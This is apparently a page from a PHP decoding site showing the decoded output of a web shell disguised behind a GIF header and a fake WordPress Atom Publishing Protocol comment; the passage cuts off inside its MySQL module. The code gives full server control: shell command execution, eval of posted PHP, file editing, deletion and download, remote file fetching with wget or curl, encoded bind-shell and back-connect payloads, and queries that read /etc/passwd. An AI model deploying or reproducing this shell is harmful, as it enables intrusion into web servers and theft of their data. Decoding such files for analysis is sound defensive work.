Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

GIF89a?????!????,???????D?;?<?php /** * Atom Publishing Protocol support for WordPress ..

Decoded Output download

if(isset($_GET['dl']) && ($_GET['dl'] != "")){ $file = $_GET['dl']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($file)."\";"); echo $filez; exit; } elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){ $file = $_GET['dlgzip']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip
"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($file).".gz\";"); echo $filez; exit; } if(isset($_GET['img'])){ @ob_clean(); $d = magicboom($_GET['y']); $f = $_GET['img']; $inf = @getimagesize($d.$f); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; @header("Content-type: ".$inf["mime"]); @header("Cache-control: public"); @header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); @header("Cache-control: max-age=".(60*60*24*7)); @readfile($d.$f); exit; } $ver = "1.01"; $software = getenv("SERVER_SOFTWARE"); if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE; $system = @php_uname(); if(strtolower(substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE; if(isset($_GET['y'])){ if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $pwd = $_GET['y']; @chdir($pwd); } } if(!$win){ if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; } else { $user = @get_current_user(); $id = $user; $prompt = $user." &gt;"; $pwd = realpath(".")."\"; $v = explode("\",$d); $v = $v[0]; foreach (range("A","Z") as $letter) { $bool = @is_dir($letter.":\"); if ($bool) { $letters .= "<a href=\"?y=".$letter.":\">[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "<span class=\"gaya\">".$letter."</span>";} $letters .= " ]</a> "; } } } if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]); $my_ip = $_SERVER['REMOTE_ADDR']; $bindport = "13123"; $bindport_pass = "C-4"; $pwds = explode(DIRECTORY_SEPARATOR,$pwd); $pwdurl = ""; for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){ $pathz = ""; for($j = 0 ; $j <= $i ; $j++){ $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; } $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>"; } if(isset($_POST['rename'])){ $old = $_POST['oldname']; $new = $_POST['newname']; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; } $buff = $software."<br />"; $buff .= $system."<br />"; if($id != "") $buff .= $id."<br />"; $buff .= "server ip : ".$server_ip." <span class=\"gaya\">|</span> your ip : ".$my_ip."<br />"; if($safemode) $buff .= "safemode <span class=\"gaya\">ON</span><br />"; else $buff .= "safemode <span class=\"gaya\">OFF<span><br />"; $buff .= $letters."&nbsp;&gt;&nbsp;".$pwdurl; function rapih($text){ return trim(str_replace("<br />","",$text)); } function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } function showdir($pwd,$prompt){ $fname = array(); $dname = array(); if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "cccc:cccc"; if($dh = opendir($pwd)){ while($file = readdir($dh)){ if(is_dir($file)){ $dname[] = $file; } elseif(is_file($file)){ $fname[] = $file; } } closedir($dh); } sort($fname); sort($dname); $path = @explode(DIRECTORY_SEPARATOR,$pwd); $tree = @sizeof($path); $parent = ""; $buff = " <form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\"> <table class=\"cmdbox\" style=\"width:50%;\"> <tr><td>$prompt</td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form> <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <tr><td>view file/folder</td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form></table><table class=\"explore\"> <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr> "; if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($pwd)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\"><a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span> <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form></td></tr> "; } elseif($folder == "..") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a href=\"?y=".$parent."\">$folder</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($parent)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td><td><span id=\"titik2\"><a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span> <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form> </td></tr>"; } else { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a> <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" /> </form> <td>DIR</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($pwd.$folder)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a></td></tr>"; } } foreach($fname as $file){ $full = $pwd.$file; if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\">$file</a> <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" /> </form> </td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($full)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td> <td><a href=\"?y=$pwd&amp;edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$full\">delete</a> | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gzip</a>)</td></tr>"; } $buff .= "</table>"; return $buff; } function ukuran($file){ if($size = @filesize($file)){ if($size <= 1024) return $size; else{ if($size <= 1024*1024) { $size = @round($size / 1024,2);; return "$size kb"; } else { $size = @round($size / 1024 / 1024,2); return "$size mb"; } } } else return "???"; } function exe($cmd){ if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')){ $buff = @shell_exec($cmd); return $buff; } } function tulis($file,$text){ $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function ambil($link,$file) { if($fp = @fopen($link,"r")){ while(!feof($fp)) { $cont.= @fread($fp,1024); } @fclose($fp); $fp2 = @fopen($file,"w"); @fwrite($fp2,$cont); @fclose($fp2); } } function which($pr){ $path = exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function download($cmd,$url){ $namafile = basename($url); switch($cmd) { case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break; case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break; case 'wfread' : ambil($wurl,$namafile);break; case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break; case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break; case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break; case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break; default: break; } return $namafile; } function get_perms($file) { if($mode=@fileperms($file)){ $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } else return "??????????"; } function clearspace($text){ return str_replace(" ","_",$text); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $shell_data = "bZDdasJAEIVfZRhykUDQgr1qELS6oJSSdhO9kRLyMzXbxqxkNw0iffdmFyux9G53znfOHMb5EkroXLa1hik4qzh+SRZh+LRmyXbOox1aXeFbAOLdBWeITwHRg/PNDO6CCyQbE5hEjG8Z3yFnz2HMkvlyyU2Y01F2o9vNqzCKrSrqjz/u1w2L4mTD11bXabMns65Ju7apCsplQa4JHRmv1yOZLE49gI9SKR90SQ1BlypIa+gJyjUVcImR9TUxO13rYwCzQyoqF1slJ8fJbG9+o1we0MfFfVRSVUGp9fFhPP7P7gPaEti3+QaqFMF5eEAzVdS/5acg9/fQ/oDwgh8="; eval(gzinflate(base64_decode($shell_data)));
$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; ?> <html><head><title>:: Luffy <?php echo $ver; ?> ::</title> <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = 'none'; document.getElementById(baru).style.display = 'block'; } </script> <style type="text/css"> body{ background:#FFFFFF;; } a { text-decoration:none; } a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#000000; } #menu{ background:#FFFFFF; margin:8px 2px 4px 2px; } #menu a{ padding:4px 18px; margin:0; background:#A9FA31; text-decoration:none; letter-spacing:2px; } #menu a:hover{ background:#A9FA31; border-bottom:1px solid #E0E1DE; border-top:1px solid #E0E1DE; } .tabnet{ margin:15px auto 0 auto; border: 1px solid #E0E1DE; } .main { width:100%; } .gaya { color: #4C83AF; } .inputz{ background:#A9FA31; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ background:#A9FA31; color:#4C83AF; margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px solid #4C83AF; } .output { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#FFFFFF; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-size:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; } .phpinfo th, th{ background:#A9FA31; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#A9FA31; padding:4px 0; } .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #4C83AF; } .explore tr:hover{ background:#A9FA31; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:none; padding:0;margin:0; } </style> </head> <body onLoad="document.getElementById('cmd').focus();"> <div class="main"> <!-- head info start here --> <div class="head_info"> <table><tr> <td><table class="b_tbl"><tr><td><a href="?"><span class="b1">C<span class="b2">-</span>4</span></a></td></tr><tr><td>Tool <?php echo $ver; ?></td></tr></table></td> <td><?php echo $buff; ?></td> </tr></table> </div> <!-- head info end here --> <!-- menu start --> <div id="menu"> <a href="?<?php echo "y=".$pwd; ?>">explore</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=shell">shell</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=php">eval</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=mysql">mysql</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">phpinfo</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">netsploit</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=upload">upload</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=mail">mail</a> </div> <!-- menu end --> <?php if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?> <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); } else echo "echo file_get_contents('/etc/passwd');"; ?> </textarea> <tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){ if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){ $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport']; if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">"; $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport; $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;\">[ databases ]</a>"; if(isset($_GET['db'])) $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>"; if(isset($_GET['table'])) $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."&amp;table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>"; $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>"; $msg .= "</div>"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $query = "DROP TABLE IF EXISTS C-4_table;
CREATE TABLE `C-4_table` ( `file` LONGBLOB NOT NULL );
LOAD DATA INFILE \"/etc/passwd\"
INTO TABLE C-4_table;SELECT * FROM C-4_table;
DROP TABLE IF EXISTS C-4_table;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $tables = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables); foreach($tables as $table){ $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\">$table</a></td></tr>"; } $msg .= "</table>"; } elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $columns = array(); $msg = "<table class=\"explore\" style=\"width:99%;\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z'])) $page = (int) $_GET['z']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){ if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\"padding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">"; for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\"".$i."\">".$i."</option>"; if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>"; } $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){ $db = $_GET['db']; $query = magicboom($_GET['sqlquery']); $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){ if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>"; $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = "&nbsp;"; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;
SHOW VARIABLES;
